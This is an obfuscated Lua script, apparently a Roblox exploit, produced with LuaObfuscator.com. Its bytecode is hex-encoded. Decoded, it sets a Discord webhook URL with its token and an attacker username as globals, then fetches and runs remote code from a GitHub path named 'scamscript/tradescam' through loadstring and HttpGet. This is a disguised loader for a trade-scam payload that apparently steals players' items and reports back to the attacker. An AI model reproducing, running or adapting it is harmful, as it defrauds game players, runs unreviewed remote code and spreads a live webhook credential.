--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -(878 -(282 + 595)))^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=568 -(367 + 201) ;local v85;while true do if (v84==0) then v85=2^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or ((1637 -(1523 + 114)) + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1 + 0)) then return (v38 * (23917454 -7140238)) + (v37 * (66493 -(892 + (245 -(67 + 113))))) + (v36 * (1321 -(68 + 997))) + v35 ;end if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + ((934 + 339) -(226 + 1044)) );v19=v19 + (17 -13) ;v34=351 -(87 + 263) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39==(7 -4)) then v46=nil;v47=nil;v39=2 + 2 ;end if ((0 -0)==v39) then v40=0;v41=nil;v39=1 + 0 ;end if (v39==4) then while true do if (v40~=(1 + 0)) then else v43=nil;v44=nil;v40=2;end if (v40==3) then v47=nil;while true do local v98=0;while true do if (1~=v98) then else if (v41==(5 -3)) then for v121=1,v24() do local v122=0;local v123;local v124;while true do if (v122==(0 + 0)) then v123=0;v124=nil;v122=1;end if (1==v122) then while true do if ((1130 -(87 + 1043))~=v123) then else v124=v22();if (v21(v124,449 -(10 + 438) ,1 + 0 )==(0 -0)) then local v173=0 + 0 ;local v174;local v175;local v176;local v177;while true do if (v173==0) then v174=0;v175=nil;v173=1;end if (v173==2) then while true do if (v174~=2) then else local v181=1180 -(1123 + 57) ;while true do if (v181~=(1 + 0)) then else v174=257 -(163 + 91) ;break;end if (v181==(1930 -(1869 + 61))) then local v189=0;while true do if (v189==1) then v181=1 + 0 ;break;end if (v189~=0) then else if (v21(v176,3 -2 ,1 -0 )==1) then v177[2]=v47[v177[2]];end if (v21(v176,1 + 1 ,2)~=(1 -0)) then else v177[3 + 0 ]=v47[v177[1477 -(1329 + 145) ]];end v189=972 -(140 + 831) ;end end end end end if (v174==0) then local v182=1850 -(1409 + 441) ;while true do if (0==v182) then v175=v21(v124,720 -(15 + 703) ,3);v176=v21(v124,4,3 + 3 );v182=1;end if (v182==(439 -(262 + 176))) then v174=1;break;end end end if (1~=v174) then else local v183=1721 -(345 + 1376) ;local v184;while true do if (0~=v183) then else v184=0;while true do if (v184~=(689 -(198 + 490))) then else v174=8 -6 ;break;end if (v184==0) then v177={v23(),v23(),nil,nil};if (v175==(0 -0)) then local v194=1262 -(1091 + 171) ;while true do if (v194==(0 + 0)) then v177[9 -6 ]=v23();v177[4]=v23();break;end end elseif (v175==(3 -2)) then v177[377 -(123 + 251) ]=v24();elseif (v175==2) then v177[14 -11 ]=v24() -((700 -(208 + 490))^16) ;elseif (v175==3) then local v199=0 + 0 ;local v200;local v201;while true do if (v199==(0 + 0)) then v200=0;v201=nil;v199=837 -(660 + 176) ;end if (v199~=(1 + 0)) then else while true do if (v200==(202 -(14 + 188))) then v201=0;while true do if (v201==(675 -(534 + 141))) then v177[3]=v24() -((1 + 1)^(15 + 1)) ;v177[4]=v23();break;end end break;end end break;end end end v184=1 + 0 ;end end break;end end end if (v174~=(6 -3)) then else if (v21(v176,4 -1 ,3)~=1) then else v177[11 -7 ]=v47[v177[3 + 1 ]];end v42[v121]=v177;break;end end break;end if (v173==(1 + 0)) then v176=nil;v177=nil;v173=2;end end end break;end end break;end end end for v125=1,v24() do v43[v125-(397 -(115 + 281)) ]=v29();end return v45;end break;end if (v98==0) then if (v41==(0 -0)) then v42={};v43={};v44={};v45={v42,v43,nil,v44};v41=868 -(550 + 317) ;end if (v41==(1 -0)) then v46=v24();v47={};for v127=1,v46 do local v128=0;local v129;local v130;local v131;local v132;while true do if (v128~=(1 -0)) then else v131=nil;v132=nil;v128=5 -3 ;end if (v128==0) then v129=285 -(134 + 151) ;v130=nil;v128=1;end if (v128==(1667 -(970 + 695))) then while true do if (v129~=0) then else local v171=0;local v172;while true do if (v171==(0 -0)) then v172=1990 -(582 + 1408) ;while true do if (v172~=(0 -0)) then else v130=0;v131=nil;v172=1 -0 ;end if (v172==1) then v129=3 -2 ;break;end end break;end end end if (v129==1) then v132=nil;while true do if (v130==(1825 -(1195 + 629))) then if (v131==(1 -0)) then v132=v22()~=(241 -(187 + 54)) ;elseif (v131==(782 -(162 + 618))) then v132=v25();elseif (v131==3) then v132=v26();end v47[v127]=v132;break;end if (v130==0) then local v179=0 + 0 ;local v180;while true do if (v179==(0 + 0)) then v180=0;while true do if (v180==(0 -0)) then local v186=0;while true do if (v186==1) then v180=1;break;end if (0==v186) then v131=v22();v132=nil;v186=1;end end end if (v180~=1) then else v130=1 -0 ;break;end end break;end end end end break;end end break;end end end v45[3]=v22();v41=1 + 1 ;end v98=1637 -(1373 + 263) ;end end end break;end if (0~=v40) then else v41=0;v42=nil;v40=1001 -(451 + 549) ;end if ((1 + 1)~=v40) then else v45=nil;v46=nil;v40=3;end end break;end if (2==v39) then v44=nil;v45=nil;v39=3;end if (v39==(1 -0)) then v42=nil;v43=nil;v39=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=(812 -(569 + 242)) -0 ;local v51=(v21(v49,1385 -(746 + 638) ,57 -37 ) * (2^(13 + 19))) + v48 ;local v52=v21(v49,31 -(1 + 9) ,372 -(218 + 123) );local v53=((v21(v49,(2637 -(706 + 318)) -(1535 + (1297 -(721 + 530))) )==(1 + 0)) and  -(1 + 0)) or (561 -(306 + 254)) ;if (v52==0) then if (v51==(0 + 0)) then return v53 * (0 -0) ;else v52=1;v50=1467 -(899 + 568) ;end elseif (v52==2047) then return ((v51==(0 + 0)) and (v53 * ((2 -1)/(603 -(33 + 235 + 335))))) or (v53 * NaN) ;end return v8(v53,v52-(1313 -((1516 -(282 + 1174)) + 230)) ) * (v50 + (v51/(2^(624 -(426 + 146))))) ;end v26=nil;function v26(v54)local v55;if  not v54 then local v86=(1500 -(1408 + 92)) -0 ;while true do if (v86==0) then v54=v24();if (v54==((1086 -(461 + 625)) + 0)) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -(701 -(271 + (1717 -(993 + 295)))) );v19=v19 + v54 ;local v56={};for v67=1 + 0 + 0 , #v55 do v56[v67]=v2(v1(v3(v55,v67,v67)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (1173 -(418 + 753)) );v19=v19 + 1 + 1 ;return (v59 * (27 + 229)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v87=0;while true do if (v87==0) then v20=v0(v3(v60,1,1));return "";end end else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v60,16));if v20 then local v99=v5(v89,v20);v20=nil;return v99;else return v89;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v90=0,v77 do if (v90>=v71) then v75[v90-v71 ]=v76[v90 + 1 ];else v79[v90]=v76[v90 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v91=0;while true do if (v91==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then local v100;local v101,v102;local v103;local v104;v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v104=v81[2];v103=v79[v81[3]];v79[v104 + 1 ]=v103;v79[v104]=v103[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v104=v81[2];v101,v102=v72(v79[v104](v13(v79,v104 + 1 ,v81[3])));v74=(v102 + v104) -1 ;v100=0;for v119=v104,v74 do local v120=0;while true do if (v120==0) then v100=v100 + 1 ;v79[v119]=v101[v100];break;end end end v73=v73 + 1 ;v81=v69[v73];v104=v81[2];v79[v104]=v79[v104](v13(v79,v104 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];elseif (v82==1) then do return;end else local v133=0;while true do if (v133==1) then v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v133=2;end if (v133==2) then v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v133=3;end if (v133==3) then v73=v81[3];break;end if (v133==0) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v133=1;end end end elseif (v82<=3) then local v114=0;local v115;local v116;while true do if (v114==0) then v115=v81[2];v116=v79[v81[3]];v114=1;end if (v114==1) then v79[v115 + 1 ]=v116;v79[v115]=v116[v81[4]];break;end end elseif (v82==4) then local v134=v81[2];local v135,v136=v72(v79[v134](v13(v79,v134 + 1 ,v81[3])));v74=(v136 + v134) -1 ;local v137=0;for v152=v134,v74 do v137=v137 + 1 ;v79[v152]=v135[v137];end else v79[v81[2]]=v81[3];end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>7) then v63[v81[3]]=v79[v81[2]];else v79[v81[2]]();end elseif (v82<=10) then if (v82>9) then v79[v81[2]]=v63[v81[3]];else local v144=0;local v145;while true do if (v144==0) then v145=v81[2];v79[v145]=v79[v145](v13(v79,v145 + 1 ,v74));break;end end end elseif (v82==11) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v73=v81[3];end v73=v73 + 1 ;break;end if (0==v91) then v81=v69[v73];v82=v81[1];v91=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313239383431372O363237313536313831392F362D5349694A734D5A737736582D6F792O4241784B716C676647646A4B545167357947595A615F59734668642O444E637348756F7139676244645F753958382O6C72326D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F63617375626131322F7363616D7363726970742F6D61696E2F74726164657363616D03083O00557365724E616D65030A3O00696F6E656C616E6B313003093O00557365724E616D653200173O0012053O00013O00260B3O000E0001000200040C3O000E0001001205000100043O00122O000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O0016000100260B3O00010001000100040C3O000100010012050001000A3O001202000100093O00122O0001000A3O00122O0001000B3O00124O00023O00044O000100012O00013O00017O00",v9(),...);
